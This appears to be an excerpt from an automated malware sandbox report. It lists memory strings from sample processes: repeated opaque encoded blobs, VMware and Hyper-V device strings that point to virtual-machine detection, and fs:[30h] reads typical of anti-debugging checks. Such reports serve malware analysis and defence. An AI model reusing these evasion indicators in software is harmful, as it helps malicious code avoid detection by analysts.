          Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rRM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sRHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s
          Source: llpb1133.exe, 00000014.00000003.441864243.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
          Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: 98D7.exe, 00000010.00000003.430490083.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
          Source: 98D7.exe, 00000010.00000003.461580588.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461569848.0000000000516000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkqej
          Source: llpb1133.exe, 00000014.00000003.441864243.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UtdY1ivSLDenB/V8xHVrjBUG3JrD4o3IQX1ghgt2B+IamPusWlAu18NyajufRz61VA4LNW7bHFQzwVQpR1KiIw05z6d3KgXyC5u1AvWRG7UC5VOBkt7ti2qKo307937u6/cACP9/s2sn1ve6M/fAiOnjnEr6q1iu7msowH4e09g/faykwGD2SxpJaNqtFbmzqhz08XeDWgZ17Tzgyg22DIHgaXWgC48nK6BOa3UjLo3qUetgdC2eqsxuGxYRssaRPmmVl/QoSW8SSBvJ6kYbaMhbu4btMTVfYPZwTK6PtZbg1oZj78GJYhoeqbVW9kTuwrBarSwAB3HqCi7cq3RW09ZhSE93V6oT2bvypRvTRem5wsNq1RTh9hguLKKXq4add0P4WQUbkdKxjCds5aX1cOlExKGpy3OnL1jyZgKrgX7YuSKYdUMy4pZCx4hGYG6MLUwbJxo1CUEt6+cVMfVo7erKXYgVJm55M/8GLsxil/Od/lwUyscGT1+h5TvTMY8t3z8uBZc+7Yey77EMWbte6VkDGfvaNRP6YvLhoThlFUpz2fOzMNsssvVFpLlMM7sPiYcBRj/xVJvYTv9qVL+Vr5hnjtrlY5L+d9WKrWauZGyqrArSHawC1ZvYkkeg0bj34ABHjsoAwysuoZaO3nvZX2UVdIFe+B0Th1hOwiHjMy47YQxtrgw35CQnS21787O37GgJtnOltjDD1rt5rxW9o2EIVg+tnl5OLaenKXezPp9aVLed09NTt52bqEut8rMrct3WSdmbi3tiprFYBbtt+fwwCkMv66KkCazedCXWRGy8pdZ4Wziy6wINeTLrGg9yQg9hbSycdR2eFN79Dp/PT42y/8ZH+P/HD9svzO3v7T5SZ5tmL11Kn/J5Jfz8q4vk09nM0O9FfXjQD67aLR09Pk6CpWM9yi/Pz9WMtutmUXDwtfNxZbWalsDY6U2BmU5eh5tZ7xy94TeboKUUY5ISk1qy1qx3DQarSOGVjUXonhhgzFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259YzFS9jjzkdsVw7SnXG/aVBu6AqxTNfh3rCwpPaxZRnkaWDCit007OnU0BV0JXUgMCxrwTl2WwFQxU/LnW/UVS0qxq8JJsmcPbrc6XK5VnbK/BnbnGz/DotlsOegmFuoYo8LmOqZDgaBhy/iy2aYdr8Lmusp/26uFlRKlPdxutXC1gAxdDbdqVd2omKChoad8tX0Sej9GwU1Jtq5eNpuONG4sea3az7wTgV0NWyPoP/OE9yx2ZG4G2
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441951171.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.000000000084F000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.464370990.0000000000874000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, D8D3.exe, 00000013.00000003.485722798.000000000084F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.290527943.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.302351871.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: 98D7.exe, 00000010.00000003.432685458.00000000004D6000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.442114467.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.432213204.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.437159148.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.435558228.00000000004D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gzFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259r
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Fbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCFpGA5bFS1lXFYb+GJ26BO9rgqnzEqujmAAnxhsKAvzJgN/qrRqasBO2qjbfiYTSCUteopvYX52cPCAiIMPjcaCjyaS9APl/TZZjXVQd6ZDAcwLjKH7UwdHYrUTfhLM259
          Source: explorer.exe, 00000004.00000000.285953189.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: 98D7.exe, 00000010.00000003.480306540.0000000000513000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000004.00000000.302351871.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: 98D7.exe, 00000010.00000003.431710822.000000000051E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: M8L5RJ4SH80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6Y@sR
          Source: llpb1133.exe, 00000014.00000003.520897937.00000000004A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\explorer.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_00428390 FindFirstFileExW,
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0092B91D push dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0041E1B1 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\4113.exeCode function: 11_2_0042950B mov eax, dword ptr fs:[00000030h]
